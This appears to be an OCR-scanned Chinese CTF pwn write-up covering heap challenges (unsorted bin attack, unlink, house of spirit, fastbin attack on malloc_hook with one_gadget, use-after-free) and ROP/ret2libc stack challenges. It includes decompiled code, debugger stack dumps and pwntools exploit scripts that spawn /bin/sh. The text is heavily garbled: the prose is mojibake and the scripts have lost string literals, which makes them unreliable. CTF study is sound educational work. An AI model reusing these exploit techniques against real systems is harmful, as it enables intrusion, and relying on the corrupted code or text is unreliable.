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create

Uunsigned __int64 create_heap()

{

int i; // [rsp+4h] [rbp-1Ch]

size_t size; // [rsp+8h] [rbp-18h]

char buf[8]; // [rsp+1l@h] [rbp-186h] BYREF
unsigned __inte4 v4; // [rsp+18h] [rbp-8h]

v4 = __readfsqword(@x28u);
for (1 =0; 1 <=9; ++1 )

{

if ( !*(&heaparray + i) )
{

}

}

printf("Size of Heap : ");
read(@, buf, 8uLL);
size = atoi(buf);
*(&heaparray + 1) = malloc(size);
if ( !*(&heaparray + i) )
{
puts("Allocate Error");
exit(2);
}
printf("Content of heap:");
read_input(*(&heaparray + 1), size);
puts("SuccessFul™);
return __readfsqword(ex28u) ~ v4;

return __readfsqword(@x28u) ~ v4;

}
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int v1; // [rsp+4h] [rbp-1Ch]

__inté4 v2; // [rsp+8h] [rbp-18h]

char buf[8]; // [rsp+1@h] [rbp-18h] BYREF
unsigned __inté64 v4; // [rsp+18h] [rbp-8h]

v4d = _ readfsqword(@x28u);
printf("Index :");

read(®, buf, 4uLL);

vl = atoi(buf);

if (vi<eoe || vi>9)

{
puts("Out of bound!"™);
_exit(e);
¥
if ( *(&heaparray + vl1) )
{

printf(“Size of Heap : ");

read(e, buf, 8ulLL);

v2 = atoi(buf);

printf("Content of heap : ");
read_input(*(&heaparray + v1), v2);
puts("Done !");

¥

else

{

puts("No such heap !");

¥

return __readfsqword(@x28u) ~ v4;

¥
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del

unsigned __int64 delete_heap()
{
int v1; // [rsp+Ch] [rbp-14h]
char buf[8]; // [rsp+1l@h] [rbp-186h] BYREF
unsigned __int64 v3; // [rsp+18h] [rbp-8h]
v3 = _ readfsqword(@x28u);
printf("Index :");
read(®@, buf, 4uLL);
vl = atoi(buf);
if (vi<e || vi>9)
{
puts("Out of bound!");
_exit(e);
}
if ( *(&heaparray + vl1) )
{
free(*(&heaparray + v1));
*(&heaparray + v1) = eLL;
puts("Done !");
}
else
{
puts("No such heap !'");
}
return __readfsqword(@x28u) ~ v3;
}
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if (v3 == 4869 )

{
if ( (unsigned _ inté4)magic <= ex13e5 )
{
puts(“"So sad !");
¥
else
{

puts(“"Congrt 1");
133t();
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.bss:00000000006020B9 align 26h
.bss:00000000006020C0 public magic
.bss:00000000006020C0 magic dg ?
.bss:00000000006020C8 align 26h
.bss:00000000006020E0 public heapar
.bss:00000000006020E0 ; void *heaparray
.bss:00000000006020E0 heaparray dg ?
.bss:00000000006020E0

.bss:00000000006020E8 db ? o
.bss:00000000006020E9 db ?
.bss:00000000006020EA db ? o
.bss:00000000006020EB db ?
.bss:00000000806020EC db ? o
.bss:00000000006020ED db ?
.bss:00000000006020EE db ?
.bss:00000000006020EF db ? o
.bss:00000000006020F0 db ?
.bss:00000000006020F1 db ? o
.bss:00000000006020F 2 db 2ons

AT RERTIABZRAT, FrlIkf12:48 3] FHunsorted bin attack, P NIxAN B w & BE AT B il 5 —AME R B, W
U3 S IR AN 61

unsorted bin attack /& *unsorted ) chunk B R 4% RIS, 23 MbinsH il 25 ok, 75 B EH i dbinstE R, THEIE+FH
A% ARG

victim bk

av bk bck

av

R IATIE T HER H,  Bvictim->bkix AT LS s AT B An bk targetith 7y, A B 2 target ik b 5 N
unsorted_chunk(av)ftit, 1X5&— MR KHIET
HARBLAR] T .

EREE, kA Redbk, ARedfd, AR R T .
AT UL o o —

exp



from pwn import

r process(

context.log level

def create(size,content):
r.recvuntil(
.sendline(

.recvuntil(

.recvuntil(

r
r
r.sendline( (size))
r
r

.sendline(content)

def edit(index, size, content):
r.recvuntil( )

.sendline(

.recvuntil( )
.sendline( (index))
.recvuntil(

.sendline( (size))
.recvuntil(

.send(content)

def delete(index):
.recvuntil(
.sendline(
.recvuntil( )
.sendline( (index))

0x0006020C0-0x10

0x10)
0x10)
, 0x10)

c Ox18+p64(0x91)+p64(0)+p64(magic))
s 0x10)

r.sendline( (4869))

r.interactive()
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tdefine unlink(P, BK, FD)

{
L

FD = P->fd;
BK P->bk;
if(FD->bk BK->fd p)

I
1

malloc_printerr (check_action,

1
J

else

{
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PD

BK

Ptr
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from pwn import

remote( ,29387)

context.log level
elf=ELF(

def create(size,content):
r.recvuntil(
.sendline(

.recvuntil(

.recvuntil(

r
r
r.sendline( (size))
r
r

.sendline(content)

def edit(index, size, content):
r.recvuntil( )
.sendline(
.recvuntil( )
.sendline( (index))
.recvuntil(
.sendline( (size))
.recvuntil(

.send(content)

def delete(index):
.recvuntil(
.sendline(
.recvuntil( )
.sendline( (index))

create(0x100,
create(0x20,

create(0x80,

payload = p64(0) p64(0x21) p64(ptr-0x18) p64(ptr-0x10)
payload p64(0x20) p64(0x90)

edit(1, (payload),payload)

p64(9) p64(9) p64(free_got)
p64(ptr-0x18) p64(ptr+0x10)

edit(1, (payload),payload)
edit(0,8,p64(system plt))

delete(2)

r.interactive()

it unlink_attack, BA 15 FrakAG 1 — RS FATRT B HI MPDAE R 1 A 2«




AT LA 2R R 2, R BRI 7 R .

PD

BK

0 system plt

1 PD

) 3 addr

3 “/bin/sh”

HEA [ 4 77 2 FRA TR 5 Bz i
ERMERGR TPD, RERITEX —RERS—F, SWREEAFEF, HH1es ifree_got, AT freelfigothFimk T
system, FGHESR2E i EBHbE, HEMRBICEDbinsh, A5 B E REROEER2, AT H system("/bin/sh").

5 — A 2 house of sprite
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from pwn import

process(

elf =ELF(

context.log level

context.terminal

def create(size,content):
p.recvuntil(
.sendline(

.recvuntil(

.recvuntil(

p
p
p.send( (size))
p
p

.send( (content))

def edit(index,size,content):
p.recvuntil( )

.sendline(
.recvuntil( )
.sendline( (index))
.recvuntil(
.send( (size))
.recvuntil(
.send( (content))

def free(index):
.recvuntil(
.sendline(
.recvuntil( )

.sendline( (index))

elf.got|[

E)

OX60 + p64(0x71) + p64(Ox6020b0-3)
(payload),payload)

create(0x68,
E] p64(0) 4 + p64(free_got)
(payload),payload)

p64(elf.plt[ D)

(payload),payload)

p.interactive()

{ERAE PR R IR B2 ek el L, LT 5 %
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char *vuln()

{
char s[24]; // [esp+6h] [ebp-18h] BYREF

printf("Enter your input> ");
return gets(s);

SEAARTEMT, W Awinl =1, win2 =2, a= Ii—H T

int _ cdecl flag(int al)
{
char s[48]; // [esp+Ch] [ebp-3Ch] BYREF
FILE *stream; // [esp+3Ch] [ebp-Ch]
stream = fopen("flag.txt", "r");
if ( lstream )

{
puts(
"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.");
exit(e);
}
fgets(s, 48, stream);
if ( winl && win2 && =1 == @xDEADBAAD )

return printf("%s", s);
if ( winl && win2 )

return puts("Incorrect Argument. Remember, you can call other functions in between each win function!");
if ( winl || win2 )

return puts("Nice Try! You're Getting There!™);
return puts("You won't get the flag that easy..");

PIA BRI 2

void win_functionl()

{
}

winl = 1;
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.Ant __cdecl win_function2(int al)

'

| int result; // eax

}

3| result = (unsigned __int8)winil;

i if ( winl && 21 == OxBAAAAAAD )

A

} win2 = 1;

o

)| else if ( winl )

4 A

' result = puts("Wrong Argument. Try Again.");
o

i else

o

] result = puts("Nope. Try a little bit harder.");
Y

i return result;

dls

exp

from pwn import

r remote( , 27728)
context.log_level

elf = ELF( )
flag addr = elf.sym[

winl_addr = elf.sym[
win2_addr = elf.sym[

p32(winl_addr)
p32(win2_addr) p32(flag_addr) p32(OxBAAAAAAD) p32(OxDEADBAAD)

r.sendlineafter( , payload)

r.interactive()
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add

int sub_AFF()
{
int result; // eax
int v1; // [rsp+8h] [rbp-8h]
int v2; // [rsp+Ch] [rbp-4h]

vl = sub_AB2();
if (vl == -1)

return puts("Full");
printf("size?");

result = sub_9EA();

/2 = result;

if ( result > @ && result <= 111 )
{

*((_QWORD *)&unk_2@20AR0 + v1) = malloc(result);
if ( '*((_QWORD *)&unk_2e2eae + v1) )
{
puts("Something Wrong!™);
exit(-1);
¥
dword_202060[v1] = v2;
printf("content:");
read(@, *((void **)&unk_2020A8 + v1), dword_22068[Vv1]);
result = puts("Done!");
} -
return result;

}

A FATE L,
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edit



.int sub_CBB()
i

int v1; // [rsp+Ch] [rbp-4h]

printf("idx?");

vl = sub_9EA();

if (vi<e || vi>9 || !'qword_2820A0[v1] )
exit(e);

printf(“content:");

sub_C39(qword_2e2eAe[v1], dword_2e2eee[v1i]);

return puts(“Done!™);

— e wrer - s s o wew

unsigned _ inté4 _ fastcall sub_C39(__int64 al, int a2)
{

unsigned __int64 result; // rax
unsigned int i; // [rsp+1Ch] [rbp-4h]

for (1 =9; ; ++1 )
{

result = i;

if ( (int)i > a2 )

break;

if ( !'read(®, (void *)((int)i + al1), 1uLL) )
exit(e);

if ( *(_BYTE *)((int)i + al) == 10 )

{

result = (int)i + al;
*(_BYTE *)result = 0;
return result;
¥
¥

return result;

¥

TR\ I 5 X size F Wi A 111
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show

Ant sub_D6F()

i
int v1; // [rsp+Ch] [rbp-4h]

printf("idx?");

vl = sub_9EA();

if (vi<e || vi>9 || !quord_202048[v1] )
exit(e);

puts((const char *)gword_2020A8[Vv1]);

| return puts("Done!™);

delete

int sub_DF7()

{
int v1; // [rsp+Ch] [rbp-4h]

printf("idx?");

vl = sub_9EA();

if (vi<e || vi>9 || !'qword_202080[v1] )
exit(e);

free((void *)qword_2028A8[Vv1]);

qword_20e2eAe[v1] = eLL;

dword_2@2060[v1] = @;

return puts("Done!");

showik i Fi delete B B#5 T o %7 -

HARFI %

Hi% P9 ~chunk, 0. 1. 2. 3

FI FHoff by onet4 1 sizetth 775 fli\xe 1, \xe1S& K AH/MX71. A Z0x71, KRG T FA 1% malloc_hook it (I 5 Oy ik 1)
chunkffisizefiz & 0x7f.

Fi1freefiitk Aunsortedrfr, XA AN £ A chunk2 (3 7 1 free ), {E 2 FRATH S22 nf AFEHI K, XM overlapping, Xtk
SR ) S T

SRIGBATTHEO0x60 1 chunk—A4™, 5t 2= MM free it Oxe O A /> HE e /3 1 —AS0x7 0 chunk Sk, 3B A& JCEE B 7, SR )50 R 1)
0x70i&7Eunsorted ', {HZFRATTAT LSz HlIX A chunk, B8 5 ik 1 A R itk 5 Ml o

T%Tﬂ@éﬂ‘]fﬂfastbin attackH@Iﬁﬂ:/th %Xq“malloc hooklﬁﬁiﬁtﬂzy J5 1352 2 Bl —AN0x70ff chunk, 5 /& chunk 24 i1l )

%Lchunkﬂ?%ﬁﬂa’]fd{m@ﬁ&, %}Eﬂﬁ{J\maIIOCEME%TmaIIocH’JiHj}j, SR J5 Frmalloc_hookih /5 5 ffione_gadget, A )5 Fi
malloc—X, Hif 1 .

from pwn import

context.log level

p=process

elf=ELF




1ibc=ELF(

def add(size,content):
p.recvuntil(
.sendline(
.recvuntil( )
.sendline( (size))
.recvuntil(

.sendline(content)

def edit(idx,content):

.sendline(
.recvuntil( )
.sendline( (idx))
.recvuntil(

.sendline(content)

show(idx):
.recvuntil(
.sendline(
.recvuntil( )
.sendline( (idx))

def delete(idx):
.recvuntil(
.sendline(
.recvuntil( )
.sendline( (idx))

E)

payload ox18
edit (@, payload)

main_arena=u64(p.recvuntil( )[-6:].1just(8,

libc_base=main_arena-0x3c4b20

libc_one_gadget=0x4526a

one_gadget=1ibc_base+libc_one_gadget
malloc_hook=1ibc_base+libc.symbols|[
realloc=1libc_base+libc.symbols[
fake_chunk=malloc_hook-0x23




payload Oxb+p64(one_gadget)+p64(realloc+13)
add (0x60, payload)

.recvuntil(

.sendline(

.recvuntil( )
.sendline( (0x20))

.interactive()

2 IEIE 5 % B B malloc_hook T Fione_gadgetilh 17, (2NN ALEH T —-realloc_hook, [F’Aone_gadgetA i /& 2
o

Pl 1ise S5 1 B4 2418 H[rsp + 0x30] = NULL 414 lone_gadget.

AT LA B2 W N 25 imalloc 5, $23RAT1A8 1, RiiZone gadget, {H &2 2 -

l
» Bx7fd77dcfc6cd <realloc+13=>
@x7fd77dcfced® <realloc+16>
@x7fd77dcfced4 <realloc+20>
@x7fd77dcfcedb <realloc+27>
@x7fd77dcfcéde <realloc+3@> ,
@x7fd77dcfceel <realloc+33> <realloc+552>
[ STACK ]
00:2000| rsp Ox7ffc95ea@3a8 — @x562581939b71 -—
@1:0088 @x7ffc95ea@3b® — @x5625819398e0@ +—
02:00180 0x7Tfc95ea03b8 «— @x2000000006
03:2018| rbp @x7ffc95ea@3c® — @x7ffc95ea@3e@ — B@x562581939TdD -—
B4 :0020 @x7ffc95ea@3cB8 —» Ox562581939T86 =—
05:0028 ox7ffc95ead3de —= @x7Tfc95ea@4cd +— @x1
B6:0030 Bx7TTc95ea@3dE «— Bx100000000
07:0038 ox7ffc95ead3e® —= @x562581939Tdo -—
[ BACKTRACE ]
» T O 7fd77dcfcocd realloc+13
fi 100000000
T2 562581939Td®
f 3 7Td77dcog830 _ libc_start_main+240
pwndbg> stack 3@
00:0000| rsp Ox7ffc95ea®3a8 — Bx562581939b71 =—
01:0008 ox7ffc95ead3b@® —= @x5625819398ed -—
@2:0010 @x7ffc95ea@3bs «— Bx2000000006
©3:2018| rbp 0x7ffc95ea@3c@® — B@x7ffc95ea@3e@ — Bx562581939Td@ -—
24 :0020 @x7ffco95ea®3c8 — @x562581939f86 =—
05:0028 @x7ffc95ea@3d® — @x7ffc95eald4cd <— @x1
@6:0030 @x7Tfc95ea@3ds «— @x100000000
@7:0038 @x7TTc95ead3ed — BOx562581939Td0 «—
08:0040 ox7ffc95ead3e8 — @x7Td77dc98830 (__libc_start main+24@) =—
29:0048 @x7ffc95ead3fe -— @x1
Ba:00e50 @x7fTc95ea@3T8 — BxT7TTc95ea@4c8 — @x7TTc95eadfd5 «— @x4553550033342F2e /* './43" */
ob: @858 @x7ffc95ead40® +— @x17e267cad
ac:0060 @x7fTc95ea@4@8 —» Bx562581939T0a =—
od: 0068 ox7ffc95ean41e -— @x@
De: 0070 @x7ffc95eal418 «— @x6f3af8d1b97cb32c
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.text
.text
.text
.text
. text
.text
.text
.text
.text
.text
.text
.text
.text
.text
.text
.text
.text
.text

:0000000000083C40 ; _ unwind {
: 000000000083 C40
: 0000000000083 C42
: 0000000000083 C44
: 0000000083 C46
: 0000000000083 C43
: 000000000083 C4B
: 000000000083 CAC
: 0000000000083 C4D
: 000000000083 C50
: 000000000083 C54
: 00000000083 C5B
: 000000083 C5E
: 000000000083 C61
: 00000000083 C67
: 00000000083 CHA
: 00000000083 C6C
: 0000000083 CEF

push
push
push
push
mov
push
push
mov
sub
mov
mov
test
jnz
test
jnz
test
jnz

ris ; Alternati
ri4

ri3

ri2

ri13, rsi

rbp

rbx

rbx, rdi

rsp, 38h

rax, cs: realloc_hook ptr
rax, [rax]

rax, rax

loc_83E68

rsi, rsi

short loc_83C75

rdi, rdi

loc_83EE®©

FATTT LL 2 H realloc+0x10 34N 5 ) sub esp 38h, JRATARIEAR, SR G T 2 561

@x7fd77dcbd2a3 [Tax]
@x7fd77dcbd2a6 | +
@x7fd77dcbd2be
[ STACK ]
00:0000| rsp Ox7Tfc95ea@368 — Ox7Td77dcfc8ef (realloc+559) +—
01:0008 @x7ffc95ea@37@ — @x7ffc95ead4cd -— @x1
22:0010 @x7ffc95ea@378 —» @x562581939a23 =— [
03:0018 @x7ffc95ea0380 -— @xa3233 /* '32\n' */
04:0020 @x7ffc95ea0388 —+ @x7fd77dcaeed9@d (atoi+l6) -+—
@5:0828 @x7ffc95ea@39@ —+ @x56258193aRal -— /* 'S5 Exit' */
06:0030| rsi Ox7ffc95ea@398 +— @x0
07 :0038 @x7ffc95ea@3a@ — @x7ffc95ea@3c@ — @x7ffc95ea@3e@ — 0@x562581939fde -—
[ BACKTRACE ]
» T @ 7fd77dcbd294
f1 7ffcosealddc
f 2 7ffco5ealdris
f3 7ffc95eal@dss
f 4 7ffc95ealna3
5 7ffcos5ealdbs
f6 7ffco5ealdch
f7 7ffc95ealade
pwndbg> stack 3@
00:0000( rsp Ox7ffc95ea@368 — O@x7fd77dcfc8ef (realloc+559) =—
01:0008 @x7Tfc95ead370 —» @Ox7ffc95eaddcd <— Ox1
@2:0010 @x7ffc95ea@378 —+ @x56258193%9a23 +— [
@3:0018 @x7Tfc95ea@380 =— @xa3233 /* '32\n' */
04:0020 @x7ffc95ea0388 — @x7fd77dcaeed@ (atoi+l6) -—
B5:0028 @x7ffc95ead39® — Ox56258193adal -— /* '"5_Exit' */
06:0030| rsi Ox7ffc95ea@398 +— @x0
@7 :00838 @x7ffc95ea@3a@ — @x7ffc95ea@3c@ — @x7Tfc95ea@3e@ — @x562581939Tdd =—

RGN T .
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(ZSTA

add

resu

if (

1t = count;
count > 5 )

return puts("Full™);

for

{

= .
-hl‘D

B,

(1 =9; 1<=4; ++1 )

(( DWORD *)&notelist + 1);
1t )

[I‘J ]

sul
(
*((_DWORD *)&notelist + i) = malloc(8u);
if ( !*((_DWORD *)&notelist + i) )
{
puts(“Alloca Error");
exit(-1);
¥
**((_DWORD **)&notelist + i) = print_note_content;
printf(“Note size :");
read(e, buf, 8u);
size = atoi(buf);

vl = *((_DWORD *)&notelist + 1);

*(_DWORD *)(vl + 4) = malloc(size);
if ( !'*(_DWORD *)(*((_DWORD *)&notelist + i) + 4) )
{
puts("Alloca Error");
exit(-1);
¥
printf(“Content :");
read(e, *(void **)(*((_DWORD *)&notelist + i) + 4), si
puts("Success !");
return ++count;

~

m
o
-

B¢ (10 5 ) R T AR A

note list f~ &p n c



https://www.cnblogs.com/zhwer/p/14009340.html

content

delete

nt del note()

int result; // eax
char buf[4]; // [esp+8h] [ebp-18h] BYREF
int v2; // [esp+Ch] [ebp-Ch]

printf("Index :");
read(e, buf, 4u);
v2 = atoi(buf);
if (v2 <@ || v2 >= count )
{
puts("Out of bound!"™);
_exit(e);

T e

(( DWORD *)&notelist + v2);
1t )

UI ]

sul
(

free(*(void **)(*((_DWORD *)&notelist + v2) + 4));

free(*((void **)&notelist + v2));

result = puts("Success");

}

return result;

= .
-hl‘D

free I 2 Ja A IS BLET4RET, uaf.



print

int print_note()
{
int result; // eax
char buf[4]; // [esp+8h] [ebp-1@h] BYREF
int v2; // [esp+Ch] [ebp-Ch]

printf("Index :");
read(@, buf, 4u);
vZ = atoi(buf);

if (v2 <@ || v2 >= count )
{
puts("Out of bound!™);
_exit(e);
}

result = *((_DWORD *)&notelist + v2);
if ( result )

result = (**((int (__cdecl ***)(_DWORD))&notelist + v2))(*((_DWORD *)&notelist + v2));
return result;

X AN 7451 H A8 print_node _contentifi 4.

Jall

liint magic()
2i{

3/ return system("/bin/sh");

41t

FIFE R vaffF H, AT ZAR ML FATT i content FH 7 21— AMistrfIchunk,
e R/NZ8 I HEERL, A il vl DL LA TS, (R Auaf, BT BLUXAN81chunk i i 23 B30, ELfEprintef Host v 2= 3
shell,

pwndbg> bins

fastbins

@x10: @x87a7048 — @xB7a7000 -— Bx0
@x18: Bx0

@x20: 2x0

@x28: Bx0

@x30: 2x0

@x38: @x87a7@58 — @xB87a7@l@ -— Bx0
@x40: @x0

unsortedbin

all: @xe

smallbins

empty

largebins

empty

pwndbg>

exp



from pwn import

context.log level

r remote( ,28932)
elf = ELF(
libc ELF( )

def add(size, content):
r.recvuntil(
.sendline( )
.recvuntil(
.sendline( (size))
.recvuntil(

.sendline(content)

"
"
"
"
"
"

.recvuntil(

def delete(idx):
r.sendlineafter(
r.sendlineafter(

def printf(idx):
r.sendlineafter(
r.sendlineafter(

system_addr=0x8048945

add(8,p32(system_addr))
printf(0)

r.interactive()

45 bjdctf_2020 babyrop2
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unsigned _ inté64 v1; // [rsp+3h] [rbp-8h]
vl = _ readfsqword(@x28u);
setvbuf(stdout, eLL, 2, eLL);
setvbuf(stdin, eLL, 1, OLL);

puts("Can u return to libc ?");

puts("Try u best!"™);

return __readfsqword(ex28u) "~ vi1;




(=]

P -

v2 = __readfsqword(@x28u);
puts("I'1ll give u some gift to help u!™);
__iso0c99_scanf("%6s", format);
printf(format);
puts(byte_400A05);

fflush(eLL);

return __readfsqword(@x28u) ~ vZ;

unsi1gnea __1Ntb4 V&; //

LrSp+Lisn |

v2 = __readfsqword(ex28u);
puts("Pull up your sword and tell me u story!");

read(@, buf,

@x64ull);

Lrop-an ]

return __readfsqword(ex28u) ~ v2;

S im L gift i AR S0 74T B iR i R libe ik, SR — R AL 1.

UX4YVE /0 <glTT+Y9.>
@x4@0871 <gift+93>

[rbp - 8]

@x4@0875 <gift+97> :[@x28]
[ STACK ]
1:0000| rdi rsp Ox7TTfffffcb520 «— @x616161616161 /* 'aaaaaa' */
..pees @x7Tffffffch38 +«— @xe9356209falf2800
':901@| rbp @x7fffffffcbée — @x7fffffffcb8® — ©x400930 (__libc_csu_init) =—
i:0@18 @x7Tffffffcb68 — @x400905 (main+43) <— , @
0020 @x7fTffffffcb7e — @x7fffffffcco@ «— @x1
11028 @x7Tffffffch78 +«— @xe9356209falf2800
110030 @x7fffffffcbge — @x400930 (__libc_csu_init) =—
@038 @x7Tffffffcb88 — @x7ffff7a2d83@ (__libc_start_main+24@) «—
[ BACKTRACE ]

- f @ 490857 gift+67

f1 490995 main+43

f 2 Fffff7a2d83® _ libc_start_main+240
indbg> stack 2@
1:0000| rdi rsp Ox7TTfffffcb520 «— @x616161616161 /* 'aaaaaa' */
..pees @x7Tffffffch38 +«— @xe9356209falf2800
':901@| rbp @x7fffffffcbée — @x7fffffffcb8® — ©x400930 (__libc_csu_init) =—
i:0@18 @x7Tffffffcb68 — @x400905 (main+43) <— , @
0020 @x7fTffffffcb7e — @x7fffffffcco@ «— @x1
11028 @x7Tffffffch78 +«— @xe9356209falf2800
110030 @x7fffffffcbge — @x400930 (__libc_csu_init) =—
10038 @x7fffffffcb88 — @x7ffff7a2d83@ (__libc_start_main+24@) -=—
110040 AxT7TFFfffffcbo@ -— @x@
1:0048 @xITTTffffcb98 — @x7TTfffffcc68 — @Ox7TTFTfTfcf95 +— '/shome/wuangwuang/Desktop/45
1:0050 AxT7TTfffffcbad -— @x100002000
1: 0058 @x7fffffffcba8 — @x4008da (main) =—
10060 @x7fffffffcbb@ -— @x@
1: 0068 @x7Tffffffcbb8 -— @xaf7eBbl6al5@cal?

BRI T canary, LA/ %7$pitt#Ecanary, FEF AL canary#lie —FERT, SREHEAT DL—HER T .



from pwn import
context.log level
r remote(

elf = ELF(
libc = ELF(

,27620)

0x400993
elf.got|
elf.plt[
vuln_addr = elf.symbols|[

r.sendlineafter(

(r.recv(16), 16)
0x18
p64(pop_rdi)
r.sendlineafter(

p64(canary) 8

p64(puts_got) p64(puts_plt)

, payload)

puts_addr ub4(r.recvuntil( )[-6:].1just(8,

libc_base = puts_addr - libc.sym[ ]

system_addr libc_base libc.sym[

bin_sh libc_base libc.search( g @)

payload 0x18 + p64(canary) 0x8

r.sendlineafter(

r.interactive()

p64(pop_rdi)

p64(vuln_addr)

p64(bin_sh)
, payload)

p64(system_addr)
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